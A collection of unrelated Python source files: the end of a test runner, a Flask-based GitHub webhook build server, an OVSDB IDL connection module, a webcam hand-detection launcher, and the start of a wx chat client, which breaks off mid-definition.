all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
if not options.isolates:
all_cases = [c for c in all_cases if not c.TestsIsolates()]
if options.report:
PrintReport(all_cases)
result = None
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 0
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
buildtester.py
|
#!/usr/bin/env python3
from flask import Flask, request, make_response, render_template
from flask_github import GitHub, GitHubError
from collections import OrderedDict
import configparser
from datetime import datetime
import atexit
import hashlib
import hmac
import json
import os
import queue
import re
import signal
import subprocess
import sys
import threading
import time
PWD = os.path.abspath(os.path.dirname(__file__))
class Options:
"""
Container for application settings
"""
class files:
"""
Container for application file settings
"""
settings = os.path.join(PWD, 'app.ini')
storage = os.path.join(PWD, 'storage')
builds = os.path.join(storage, 'builds')
temp = os.path.join(storage, 'temp')
pickup = None
class app:
"""
Container for general build settings
"""
status_uri = None
status_endpoint = '/status/<sha1>'
push_endpoint = '/gh/push'
port = 7000
title = 'Example'
cleanup_frequency = 300
default_context = 'build'
class status:
"""
Container for possible build statuses
"""
success = 'The build succeeded'
error = 'The build failed due to an internal error'
failure = 'The build failed'
queued = 'The build is queued'
pending = 'The build is in progress'
class github:
"""
Container for GitHub settings
"""
access_token = None
webhooks_secret = None
repository = None
branch = None
status_endpoint = None
commit_uri = None
commands = OrderedDict()
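# Illustrative app.ini layout understood by initialize() below; every value
# here is a placeholder, not a shipped default:
#
#   [app]
#   port = 7000
#   title = Example Project
#
#   [github]
#   access_token = <personal access token>
#   webhooks_secret = <webhook secret>
#   repository = https://github.com/example/project.git
#   branch = master
#   status_endpoint = /repos/example/project/statuses/{sha1}
#   commit_uri = https://github.com/example/project/commit/{sha1}
#
#   [commands]
#   build|Compile = make -j4
#   test|Unit tests = make test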
# Global variables
QUEUE = queue.Queue()
WATCH = None
PROCESS = None
RUNNING = True
LOCK = threading.Lock()
GITHUB_LOCK = threading.Lock()
# Initialize Flask app
app = Flask(__name__)
# Initialize GitHub lib. We use a personal token for this and not a client
# id / secret
app.config['GITHUB_CLIENT_ID'] = ''
app.config['GITHUB_CLIENT_SECRET'] = ''
github = GitHub(app)
def cleanup_hash(sha1):
"""
Checks if a hash is valid. Returns the cleaned up hash if so, else False
:param sha1: The hash to check
:return: mixed
"""
sha1 = sha1.strip()
try:
if len(sha1) > 0 and int(sha1, 16) > 0:
# Hash is valid
return sha1
except ValueError:
print("Invalid sha1 commit: {sha1}".format(sha1=sha1))
# Hash is invalid
return False
def retry_stale_builds():
"""
Locates and reschedules stale builds
:return: None
"""
global QUEUE
for root, dirs, files in os.walk(Options.files.builds):
for file in files:
# Absolute filename
filename = os.path.join(Options.files.builds, file)
# Get file stats
stat = os.stat(filename)
if stat.st_size > 32:
# This file is > 32 bytes, meaning it is a completed build
continue
try:
# Wrap this whole thing in a super generic try-catch because
# of potential corruption
# Open file
with open(filename, 'r') as file_:
# JSON-decode file
data = json.load(file_)
if data.get('status') == 'pending':
print("Re-queuing stale job: {sha1}".format(sha1=file))
# Put back in the queue. It failed in the middle of a build
QUEUE.put(file)
# Stop processing and get back to the actual queue process
return
except Exception:
# Catch any exceptions
if os.path.getmtime(filename) < time.time() - 10:
print("Re-queuing corrupt job: {sha1}".format(sha1=file))
# Remove file
os.unlink(filename)
                    # The file was not modified in the last 10 seconds, so
                    # treat it as corrupt and re-queue it
QUEUE.put(file)
def execute_command(command):
"""
Execute the provided command
:param command: A list of arguments
:return: A tuple containing the output and return code
"""
# Execute command
process = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# Return result
return process.communicate()[0].decode('utf-8'), process.returncode
def init_dirs():
"""
Initialize dirs. This creates necessary directories
:return: None
"""
# Initialize directories
for path in [Options.files.storage, Options.files.builds,
Options.files.temp]:
# Create directory
subprocess.call(['mkdir', '-p', path])
def init_files():
"""
Initialize files. This initializes the GIT repo
:return: None
"""
# Init dirs
init_dirs()
# Change working directory
os.chdir(Options.files.storage)
# Init repo
stdout, ret = execute_command(['git', 'clone', '--recursive',
Options.github.repository,
Options.files.temp, '-b',
Options.github.branch])
# Change working directory
os.chdir(Options.files.temp)
# Cleanup any untracked files/directories
execute_command(['git', 'clean', '-f', '-d'])
if ret != 0:
# Fetch remote repo
stdout, ret = execute_command(['git', 'fetch', 'origin',
Options.github.branch])
if ret != 0:
print("Fetch failed ({code}): {error}".format(error=stdout,
code=ret))
return False
# Hard reset to get to the right commit
stdout, ret = execute_command(['git', 'reset', '--hard', 'origin/' +
Options.github.branch])
if ret != 0:
print("Reset failed ({code}): {error}".format(error=stdout,
code=ret))
return False
return True
def write_build_file(data, status, sha1, context, write_file=True,
post_gh=True):
"""
Writes the data to the build file for the given hash
:param data: a list of data
:param status: the status of the build
:param sha1: the commit hash to use for the filename
:param context: The context of this status
:param write_file: Should we write the file?
:param post_gh: Should we post to GitHub?
:return: None
"""
global GITHUB_LOCK
print("Building {sha1} stage {stage}: {status}".format(sha1=sha1,
stage=context,
status=status))
if write_file:
# Path to file
path = os.path.join(Options.files.builds, sha1)
# Open data file
with open(path, 'w') as file_:
# Write data
if data is not None:
# Write a status + data
file_.write(json.dumps(dict(status=status,
data=data), indent=4))
else:
# Write a status only
file_.write(json.dumps(dict(status=status), indent=4))
if post_gh:
description = getattr(Options.status, status)
if status == 'queued':
# GitHub doesn't support a queued status
status = 'pending'
# Update GH status
data = dict(
state=status,
description=description,
context=context
)
if Options.app.status_uri is not None:
# Only set target url if it is configured
data['target_url'] = Options.app.status_uri.format(sha1=sha1)
# Acquire GH lock
GITHUB_LOCK.acquire()
try:
github.post(Options.github.status_endpoint.format(sha1=sha1), data)
except GitHubError as e:
sys.stderr.write("Error posting to GitHub: {err}\n".format(
err=str(e)))
finally:
# Release GH lock
GITHUB_LOCK.release()
def build(sha1):
"""
Builds the repo checked out to sha1
:param sha1: The commit to checkout
:return: None
"""
print("Building {sha1}".format(sha1=sha1))
# Initialize repo to the given sha1 commit
if not init_files():
# Mark as error
write_build_file(None, 'error', sha1, Options.app.default_context,
post_gh=False)
# Abort
return
data = list()
# Mark as pending
write_build_file(None, 'pending', sha1, Options.app.default_context,
post_gh=False)
# Checkout commit
stdout, ret = execute_command(['git', 'reset', '--hard', sha1])
data.append(dict(
cmd='Checkout',
out=stdout,
code=ret
))
if ret != 0:
write_build_file(data, 'failure', sha1, Options.app.default_context,
post_gh=False)
return
# Get the full SHA1 hash
stdout, ret = execute_command(['git', 'rev-parse', 'HEAD'])
if ret != 0:
data.append(dict(
cmd='Rev-parse',
out=stdout,
code=ret
))
write_build_file(data, 'failure', sha1,
Options.app.default_context, post_gh=False)
return
stdout = stdout.strip()
if stdout != sha1:
# Source and destination files
destination = os.path.join(Options.files.builds, stdout)
write_build_file([dict(redirect=stdout)], 'success', sha1,
Options.app.default_context, post_gh=False)
if os.path.exists(destination):
# No more to do
return
# Use full hash
sha1 = stdout
# Mark as pending
write_build_file(None, 'pending', sha1, Options.app.default_context)
good_contexts = list()
bad_context = None
for label, command in Options.commands.items():
# Expand tuple
context, command = command
if context != Options.app.default_context and context not in \
good_contexts:
# Mark as pending
write_build_file(None, 'pending', sha1, context, write_file=False)
# Execute command
stdout, ret = execute_command(command.split(" "))
data.append(dict(
cmd=label,
out=stdout,
code=ret
))
if ret == 0:
if context not in good_contexts:
# Add to list of good contexts
good_contexts.append(context)
else:
# Build failed
write_build_file(data, 'failure', sha1, context)
# Remove
if context in good_contexts:
good_contexts.remove(context)
bad_context = context
# Stop processing
break
written = False
status = 'success' if bad_context is None else 'failure'
for context in good_contexts:
# Write a success status
write_build_file(data, status, sha1, context,
write_file=not written)
written = True
if bad_context is not None and Options.app.default_context != bad_context:
# Mark as failure if there were any failures and the default context
# was not already used
write_build_file(None, 'failure', sha1, Options.app.default_context,
write_file=False)
elif bad_context is None and Options.app.default_context not in \
good_contexts:
# Mark as success if there were no failures and the default context
# was not already used
write_build_file(data, 'success', sha1, Options.app.default_context,
write_file=False)
# Init dirs
init_dirs()
def process_queue():
"""
Process the queue
:return: None
"""
global QUEUE
global RUNNING
# Process queue
while RUNNING:
# Get the next commit hash from the queue
try:
wait = Options.app.cleanup_frequency
if wait < .1:
# Wait at least .1s
wait = .1
# Try getting an item.
sha1 = QUEUE.get(True, wait)
# Start build
build(sha1)
except queue.Empty:
# There hasn't been anything to do for cleanup_frequency seconds,
            # let's do some housekeeping
retry_stale_builds()
def watch_queue():
"""
Watches the file queue for changes
:return: None
"""
global RUNNING
global LOCK
global WATCH
global PROCESS
# Process queue
while RUNNING:
if Options.files.pickup is not None and \
os.path.exists(Options.files.pickup):
hashes = list()
# Acquire lock
LOCK.acquire()
# Open pickup file for reading
with open(Options.files.pickup, "r") as file_:
# Get all the hashes
for sha1 in file_:
sha1 = cleanup_hash(sha1)
if sha1:
hashes.append(sha1)
# Open pickup file for writing
with open(Options.files.pickup, "w") as file_:
# Truncate file
file_.seek(0)
file_.truncate()
# Release lock
LOCK.release()
for sha1 in hashes:
# Mark as queued
write_build_file(None, 'queued', sha1,
Options.app.default_context, post_gh=False)
# Add to queue
QUEUE.put(sha1)
# Sleep for .1 seconds before we look for more builds to perform
time.sleep(0.1)
def shutdown(signum, frame):
"""
We received a signal, so we need to shut down our child threads
:param signum: The signal number
:param frame: The frame info
:return: None
"""
global RUNNING
RUNNING = False
# Remove handler
signal.signal(signum, signal.SIG_DFL)
# Throw signal
os.kill(os.getpid(), signum)
@app.route('/')
def home():
"""
Displays the most recent builds
:return: response
"""
commits = list()
for root, dirs, files in os.walk(Options.files.builds):
for file in files:
# Add to collection
commits.append(file)
# Sort by last updated descending
commits = list(sorted(commits, key=lambda f: os.stat(os.path.join(
Options.files.builds, f)).st_mtime, reverse=True))
builds = list()
count = 0
for commit in commits:
# Increment counter
count += 1
# Full path
filename = os.path.join(Options.files.builds, commit)
data = dict()
if count <= 5:
# Only load data for the 5 most recent builds
with open(filename, 'r') as file_:
data = json.load(file_)
# Initialize required data
if not isinstance(data, dict):
data = dict()
data['status'] = data.get('status', '')
if not isinstance(data.get('data'), list):
data['data'] = list()
message = ''
redirect = False
if len(data['data']) > 0:
redirect = data['data'][0].get('redirect', False)
if redirect is not False:
data['data'][0] = dict(
cmd='Redirect',
code=0,
out='Redirects to {sha1}'.format(sha1=redirect)
)
message = 'Resolved from {} to {}'.format(commit, redirect)
commit = redirect
# Full path
filename = os.path.join(Options.files.builds, commit)
checkout = data['data'][0]
if checkout['cmd'] == 'Checkout' and checkout['code'] == 0:
                    result = re.search(r'^HEAD is now at [0-9a-f]+\s*(.+$)', checkout['out'])
if result:
# Get the actual message
message = result.group(1)
else:
# If the regexp didn't match for some reason, fall back
# to the raw data
message = checkout['out']
status_label, status_nice = resolve_status(data['status'])
# Get mtime
mtime = os.stat(filename).st_mtime
# Format mtime
mtime = datetime.fromtimestamp(mtime).strftime('%B %d, %Y %H:%M')
if redirect is not False:
status_nice = ''
builds.append(dict(sha1=commit,
date=mtime,
status_nice=status_nice,
status_label=status_label,
message=message))
return render_template('index.html', builds=builds,
title=Options.app.title)
def resolve_status(code):
"""
Get a label and status for the status code
:param code: The status to resolve
:return: A tuple containing the label and new status
"""
# Default label
status_label = 'info'
if code == 'success':
status_nice = 'Build Succeeded'
status_label = 'success'
elif code == 'error':
status_nice = 'Build Failed (Internal Error)'
status_label = 'danger'
elif code == 'failure':
status_nice = 'Build Failed'
status_label = 'danger'
elif code == 'queued':
status_nice = 'Build Queued'
elif code == 'pending':
status_nice = 'Build Running'
else:
status_nice = code
return status_label, status_nice
def build_status(sha1):
"""
Displays the build status for a sha1 commit
:param sha1: the sha1 commit
:return: response
"""
global LOCK
sha1 = cleanup_hash(sha1)
if sha1 is not False:
filename = os.path.join(Options.files.builds, sha1)
if sha1 is False:
data = dict()
data['data'] = list()
data['status'] = 'failure'
sha1 = 'INVALID'
data['message'] = 'Invalid commit requested'
elif os.path.exists(filename):
with open(filename) as file:
data = json.load(file)
if len(data['data']) > 0 and data['data'][0].get(
'redirect') is not None:
# Load the redirect
return build_status(data['data'][0].get('redirect'))
else:
# Acquire lock
LOCK.acquire()
if Options.files.pickup is not None:
# File-based queue
with open(Options.files.pickup, 'a') as file_:
file_.write(sha1 + "\n")
else:
# Memory queue only
# Mark as queued
write_build_file(None, 'queued', sha1, Options.app.default_context,
post_gh=False)
# Just store in memory
QUEUE.put(sha1)
# Release lock
LOCK.release()
data = dict(status='queued')
data['data'] = data.get('data', list())
data['status'] = data.get('status', '')
data['sha1'] = sha1
data['short_sha1'] = sha1[0:8]
data['message'] = ''
# Default label
data['status_label'], data['status_nice'] = resolve_status(data['status'])
if len(data['data']) > 0:
# Get the name of the latest commit
checkout = data['data'][0]
if checkout['cmd'] == 'Checkout' and checkout['code'] == 0:
            result = re.search(r'^HEAD is now at [0-9a-f]+\s*(.+$)', checkout['out'])
if result:
# Get the actual message
data['message'] = result.group(1)
else:
# If the regexp didn't match for some reason, fall back to
# the raw data
data['message'] = checkout['out']
# Remove from collection
data['data'] = data['data'][1:]
data['commit_uri'] = Options.github.commit_uri.format(sha1=sha1)
data['title'] = Options.app.title
return render_template('status.html', **data)
def gh_push():
"""
Processes a GitHub push WebHook
:return: response
"""
global LOCK
if Options.github.webhooks_secret is not None:
# Get request signature
signature = request.headers.get('X-Hub-Signature')
if signature is None:
print("Unauthorized")
return make_response(('Unauthorized', 403))
# Get request data
data = request.get_data(as_text=True)
# Calculate HMAC digest
digest = hmac.new(Options.github.webhooks_secret.encode('utf-8'),
data.encode('utf-8'),
digestmod=hashlib.sha1)
if not hmac.compare_digest('sha1=' + digest.hexdigest(), signature):
print("Unauthorized: {sig}".format(sig=signature))
return make_response(('Unauthorized', 403))
# Get JSON request
req = request.get_json()
if req.get('ref') != 'refs/heads/' + Options.github.branch:
print('Skipping invalid ref: {ref}'.format(ref=req.get('ref')))
return make_response("Ignoring branch", 200)
sha1 = req.get('after')
# Acquire lock
LOCK.acquire()
if Options.files.pickup is not None:
# Write to pickup file
with open(Options.files.pickup, 'a') as file_:
file_.write(sha1 + "\n")
else:
# Mark as queued
write_build_file(None, 'queued', sha1, Options.app.default_context,
post_gh=False)
# Just store in memory
QUEUE.put(sha1)
# Release lock
LOCK.release()
return make_response(json.dumps('Starting build'), 200,
{'Content-Type': 'application/json'})
@github.access_token_getter
def token_getter():
"""
Returns the GitHub access token
:return: the token
"""
return Options.github.access_token
def initialize(argv=sys.argv[1:]):
"""
Initialize the server
:return: None
"""
global PROCESS
global RUNNING
global WATCH
if len(argv) > 0:
# Options file specified
Options.files.settings = argv[0]
try:
# Initialize config parser
parser = configparser.ConfigParser()
# Load config
parser.read(Options.files.settings)
# Get sections
sections = parser.sections()
# Remove invalid sections
sections = list(v for v in sections if hasattr(Options, v))
for section in sections:
# Grab the Options.{section} object so this is a bit cleaner
options_section = getattr(Options, section)
if isinstance(options_section, dict):
for key, val in parser.items(section):
# Fill up our dictionary. optionxform lowercases keys;
# rather than overriding it (which would make the whole
# file case-sensitive), just apply str.title() to the
# keys before storing them
options_section[key.title()] = val
else:
for key in parser[section]:
# Iterate app section
if hasattr(options_section, key):
# If this is a valid option, replace the default
setattr(options_section, key, parser.get(section, key))
except configparser.Error as e:
print("Config parsing error: {err}".format(err=e.message))
sys.exit(1)
# Free memory
del parser
del sections
# Validate config
if Options.github.branch is None:
print("The GitHub branch must be configured!")
sys.exit(1)
if Options.files.pickup == '':
Options.files.pickup = None
try:
Options.app.port = int(Options.app.port)
except ValueError:
print("Invalid listen port specified!")
sys.exit(1)
try:
Options.app.cleanup_frequency = float(Options.app.cleanup_frequency)
except ValueError:
print("Invalid cleanup frequency specified!")
sys.exit(1)
# Parse commands
commands = OrderedDict()
for label, command in Options.commands.items():
if '|' in label:
context, label = label.split('|')
context = context.lower()
label = label.title()
else:
context = Options.app.default_context.lower()
# Add to collection
commands[label] = context, command
# Replace commands in options
Options.commands = commands
# Register routes
if Options.app.push_endpoint != '':
app.route(Options.app.push_endpoint, methods=['post'])(gh_push)
if Options.app.status_endpoint != '':
app.route(Options.app.status_endpoint, methods=['get'])(build_status)
# Initialize dirs
init_dirs()
# Register signal handlers
signal.signal(signal.SIGINT, shutdown)
signal.signal(signal.SIGTERM, shutdown)
signal.signal(signal.SIGHUP, shutdown)
# Register shutdown handler
atexit.register(init_dirs)
# Init threads
PROCESS = threading.Thread(target=process_queue)
if Options.files.pickup is not None:
# Only init the queue watching thread if there is a file queue
WATCH = threading.Thread(target=watch_queue)
# Start thread
PROCESS.start()
if Options.files.pickup is not None:
# Only start the queue watching thread if there is a file queue
WATCH.start()
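# Illustrative only (not part of the original server): a minimal settings file
# that initialize() above would accept. Section and option names come from the
# Options attributes referenced in this module; the values are hypothetical.
#
#   [github]
#   branch = master
#   webhooks_secret = changeme
#
#   [app]
#   port = 5000
#   cleanup_frequency = 3600
#
#   [files]
#   pickup = /tmp/ci-pickup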
def startup():
"""
Starts up the Flask server
:return: None
"""
app.run(port=Options.app.port)
def deinitialize():
"""
De-initializes the server
:return: None
"""
global RUNNING
global LOCK
global WATCH
global PROCESS
# Stop the threads
RUNNING = False
# Wait for threads to finish
PROCESS.join()
if Options.files.pickup is not None:
# Only wait on the queue watching thread if there is a file queue
WATCH.join()
if __name__ == '__main__':
initialize()
if Options.app.port != 0:
# Startup Flask if necessary
startup()
else:
# Wait for the process to finish
PROCESS.join()
deinitialize()
|
connection.py
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import queue
import threading
import time
import traceback
from ovs.db import custom_index
from ovs.db import idl
from ovs import poller
from ovsdbapp.backend.ovs_idl import idlutils
from ovsdbapp import exceptions
if os.name == 'nt':
from ovsdbapp.backend.ovs_idl.windows import connection_utils
else:
from ovsdbapp.backend.ovs_idl.linux import connection_utils
LOG = logging.getLogger(__name__)
class TransactionQueue(queue.Queue, object):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._wait_queue = connection_utils.WaitQueue(
max_queue_size=self.maxsize)
def get_nowait(self, *args, **kwargs):
try:
result = super().get_nowait(*args, **kwargs)
except queue.Empty:
return None
self._wait_queue.alert_notification_consume()
return result
def put(self, *args, **kwargs):
super().put(*args, **kwargs)
self._wait_queue.alert_notify()
@property
def alert_fileno(self):
return self._wait_queue.alert_fileno
class Connection(object):
def __init__(self, idl, timeout):
"""Create a connection to an OVSDB server using the OVS IDL
:param timeout: The timeout value for OVSDB operations
:param idl: A newly created ovs.db.Idl instance (run never called)
"""
self.timeout = timeout
self.txns = TransactionQueue(1)
self.lock = threading.RLock()
self.idl = idl
self.thread = None
self.is_running = None
def start(self):
"""Start the connection."""
with self.lock:
if self.thread is not None:
return False
if not self.idl.has_ever_connected() or self.is_running is False:
if self.is_running is False: # stop() was called
self.idl.force_reconnect()
idlutils.wait_for_change(self.idl, self.timeout)
try:
self.idl.post_connect()
except AttributeError:
# An ovs.db.Idl class has no post_connect
pass
self.poller = poller.Poller()
self.is_running = True
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def run(self):
errors = 0
while self.is_running:
# If we fail in an Idl call, we could have missed an update
# from the server, leaving us out of sync with ovsdb-server.
# It is not safe to continue without restarting the connection.
# Though it is likely that the error is unrecoverable, keep trying
# indefinitely just in case.
try:
self.idl.wait(self.poller)
self.poller.fd_wait(self.txns.alert_fileno, poller.POLLIN)
self.poller.block()
with self.lock:
self.idl.run()
except Exception as e:
# This shouldn't happen, but is possible if there is a bug
# in python-ovs
errors += 1
LOG.exception(e)
with self.lock:
self.idl.force_reconnect()
try:
idlutils.wait_for_change(self.idl, self.timeout)
except Exception as e:
# This could throw the same exception as idl.run()
# or Exception("timeout"), either way continue
LOG.exception(e)
sleep = min(2 ** errors, 60)
LOG.info("Trying to recover, sleeping %s seconds", sleep)
time.sleep(sleep)
continue
errors = 0
txn = self.txns.get_nowait()
if txn is not None:
try:
with self.lock:
txn.results.put(txn.do_commit())
except Exception as ex:
er = idlutils.ExceptionResult(ex=ex,
tb=traceback.format_exc())
txn.results.put(er)
self.txns.task_done()
self.idl.close()
def stop(self, timeout=None):
if not self.is_running:
return True
self.is_running = False
self.txns.put(None)
self.thread.join(timeout)
if self.thread.is_alive():
return False
self.thread = None
return True
def queue_txn(self, txn):
# Even if we aren't started, we can queue a transaction and it will
# run when we are started
try:
self.txns.put(txn, timeout=self.timeout)
except queue.Full as e:
raise exceptions.TimeoutException(commands=txn.commands,
timeout=self.timeout,
cause='TXN queue is full') from e
class OvsdbIdl(idl.Idl):
def cooperative_yield(self):
time.sleep(0)
@classmethod
def from_server(cls, connection_string, schema_name, *args,
helper=None, helper_tables=None, **kwargs):
"""Create the Idl instance by pulling the schema from OVSDB server
:param connection_string: Connection name
:type connection_string: string
:param schema_name: Schema name
:type schema_name: string
:param helper: Helper instance
:type helper: ``idl.SchemaHelper``
:param helper_tables: Tables to be registered in the helper
:type helper_tables: Iterator of strings
"""
if not helper:
helper = idlutils.get_schema_helper(connection_string, schema_name)
if not helper_tables:
helper.register_all()
else:
for table in helper_tables:
helper.register_table(table)
return cls(connection_string, helper, **kwargs)
def post_connect(self):
"""Operations to execute after the Idl has connected to the server
An example would be to set up Idl notification handling for watching
and unwatching certain OVSDB change events
"""
def update_tables(self, tables, schema):
"""Add the tables to the current Idl if they are present in the schema
:param tables: List of tables to be registered
:type tables: List
:param schema: Schema description
:type schema: dict or string
"""
schema_helper = idlutils.create_schema_helper(schema)
# Register only available registered tables - DB downgrade, and the
# newly added tables - DB upgrade
for table in self.tables.keys() | tables:
if table in schema_helper.schema_json['tables']:
schema_helper.register_table(table)
schema = schema_helper.get_idl_schema()
self._db = schema
self.tables = schema.tables
for table in schema.tables.values():
for column in table.columns.values():
if not hasattr(column, 'alert'):
column.alert = True
table.need_table = False
table.rows = custom_index.IndexedRows(table)
table.idl = self
table.condition = [True]
table.cond_changed = False
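# Illustrative usage sketch only (not part of the original module), assuming an
# OVSDB server is reachable at tcp:127.0.0.1:6640 and serves the Open_vSwitch
# schema; both the connection string and schema name are assumptions.
if __name__ == '__main__':
    example_idl = OvsdbIdl.from_server('tcp:127.0.0.1:6640', 'Open_vSwitch')
    conn = Connection(example_idl, timeout=10)
    conn.start()  # spawns the daemon thread that runs the Idl loop
    conn.stop()   # enqueues the sentinel and joins the thread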
|
detect_multi_threaded.py
|
import argparse
import copy
from multiprocessing import Queue
from threading import Thread
from typing import List, Dict
import cv2
from utils import Worker, Calibration
from utils.webcam_video_stream import WebcamVideoStream
from utils.zmq_publisher import HandPositionPublisher, MarkerPublisher
from utils.synchronized_variable import SynchronizedVariable
from lib.state_machine import StateMachine
from lib.command_line_input import CommandLineInput
from lib.opencv_window import OpenCVWindow
from state_implementations.define_aoi_state import DefineAoi
from state_implementations.initial_state import InitialState
from state_implementations.exit_state import ExititingState
from state_implementations.aoi_mkr_selection_state import DefineAoiMarkerSelectionState
from state_implementations.aoi_name_state import DefineAoiNameState
from state_implementations.aoi_draw_state import DefineAoiDrawState
score_thresh = 0.2
if __name__ == '__main__':
# TODO Add option to generate markers
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-img', '--image', dest="image_file", type=open,
default=None,
help='For debugging purposes, you can provide a path '
'to an image. Setting this will ignore the '
'source setting.')
parser.add_argument('-video', '--video', dest="video_file", type=open,
default=None,
help='For debugging purposes, you can provide a path '
'to a video. Setting this will ignore the source '
'setting.')
parser.add_argument('-nhands', '--num_hands', dest='num_hands', type=int,
default=2, help='Max number of hands to detect.')
parser.add_argument('-fps', '--fps', dest='fps', type=int, default=True,
help='Show FPS on detection/display visualization')
parser.add_argument('-wd', '--width', dest='width', type=int, default=888,
help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=500,
help='Height of the frames in the video stream.')
parser.add_argument('-ds', '--display', dest='display', type=int,
default=True,
help='Display the detected images using OpenCV. This '
'reduces FPS')
parser.add_argument('-num-w', '--num-workers', dest='num_workers',
type=int, default=4, help='Number of workers.')
parser.add_argument('-q-size', '--queue-size', dest='queue_size', type=int,
default=5, help='Size of the queue.')
parser.add_argument('-c', '--calibration-file', dest='calibration_file',
type=open, default=None,
help='Camera calibration file.')
args = parser.parse_args()
if args.video_file is not None and args.image_file is not None:
raise ValueError("Provide either video or image file, not both.")
input_q = Queue(maxsize=args.queue_size)
output_q = Queue(maxsize=args.queue_size)
# No max size here, because this would limit the number of hands/markers
# we're able to detect per frame
center_points_q = Queue()
marker_q = Queue()
cap_params = {}
zmq_publishers = [
HandPositionPublisher(center_points_q),
MarkerPublisher(marker_q)
]
for publisher in zmq_publishers:
publisher.start()
cap_params['score_thresh'] = score_thresh
# max number of hands we want to detect/track
cap_params['num_hands_detect'] = args.num_hands
def next_image(): return
def cleanup(): return
if args.image_file is not None:
image_file = cv2.imread(args.image_file.name)
# OpenCV images are indexed as (height, width, channels)
cap_params['im_width'] = image_file.shape[1]
cap_params['im_height'] = image_file.shape[0]
def next_image(): return copy.deepcopy(image_file)
elif args.video_file is not None:
# If it's a video file, we want the system to take all the time it
# needs to process every single frame. Thus, the frames from the file
# are queued and processed one after another. To guarantee that the
# output is fluid when using a web cam, only the currently captured
# frame is processed.
video_capture = WebcamVideoStream(args.video_file.name, args.width,
args.height, queued=True)\
.start()
cap_params['im_width'] = args.width
cap_params['im_height'] = args.height
def next_image(): return video_capture.read()
def cleanup(): return video_capture.stop()
else:
video_capture = WebcamVideoStream(args.video_source, args.width,
args.height)\
.start()
cap_params['im_width'] = args.width
cap_params['im_height'] = args.height
def next_image(): return cv2.flip(video_capture.read(), 1)
def cleanup(): return video_capture.stop()
if args.calibration_file is not None:
calibration = Calibration(args.calibration_file)
else:
calibration = None
latest_markers: SynchronizedVariable[List[Dict]] = SynchronizedVariable([])
for i in range(args.num_workers):
Thread(target=lambda *args: Worker(*args).run(), daemon=True,
args=(input_q, output_q, marker_q, center_points_q,
cap_params, latest_markers, calibration))\
.start()
window = OpenCVWindow('Multi-Threaded Detection')
window.create()
def cleanup_():
print("Stopping ZMQ publishers...")
for publisher in zmq_publishers:
publisher.cancel()
print("Cleaning up...")
cleanup()
print("Closing OpenCV windows...")
window.destroy()
cli_input = CommandLineInput()
cli_input.start_capture()
InitialState.init_args = (next_image, window)
DefineAoi.init_args = (latest_markers,)
DefineAoi.initial_state = DefineAoiMarkerSelectionState
DefineAoiNameState.init_args = (cli_input,)
DefineAoiMarkerSelectionState.init_args = (window, cli_input)
DefineAoiDrawState.init_args = (window, cli_input)
ExititingState.init_args = (cleanup_,)
state_machine = StateMachine(window, cli_input, input_q, output_q, args.fps,
args.display)
state_machine.enter_state(InitialState)
running = True
while True:
exit_state = state_machine.run()
if not running:
break
if isinstance(state_machine.current_state, ExititingState):
running = False
|
ZyqChat.py
|
import wx
import threading
import socket
from time import sleep, ctime
from enum import Enum, IntEnum, unique
import os
import sys
import signal
import getpass
class StyleList(Enum):
OUTPUT = 2
SEND = 3
RECE = 4
class MyStyle(wx.TextAttr):
def __init__(self, style = None):
wx.TextAttr.__init__(self)
self.SetAlignment(wx.TEXT_ALIGNMENT_LEFT)
self.SetFontSize(12)
self.__SetSty(style)
def __SetSty(self, style):
if StyleList.OUTPUT == style:
self.SetTextColour(wx.RED)
elif StyleList.SEND == style:
self.SetTextColour(wx.Colour(30,25,125))
self.SetAlignment(wx.TEXT_ALIGNMENT_RIGHT)
self.SetParagraphSpacingBefore(20)
elif StyleList.RECE == style:
self.SetTextColour(wx.BLUE)
self.SetAlignment(wx.TEXT_ALIGNMENT_LEFT)
self.SetParagraphSpacingBefore(20)
else:
pass
class Data():
__remoteIp = ''
@classmethod
def GetLocalIp(cls):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
return ip
@classmethod
def GetHostName(cls):
hostName = socket.gethostname()
return hostName
@classmethod
def GetUser(cls):
user = getpass.getuser()
return user
@classmethod
def GetServerPort(cls):
return 12345
@classmethod
def GetClientPort(cls):
return 54321
@classmethod
def SetRemoteIp(cls,remoteIp):
Data.__remoteIp = remoteIp
@classmethod
def GetRemoteIp(cls):
return Data.__remoteIp
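# Illustrative sketch only (not part of the original program): the UDP trick
# used by Data.GetLocalIp above. Connecting a datagram socket to a public
# address sends no packets, but lets getsockname() report the local outbound IP.
def _example_local_ip():
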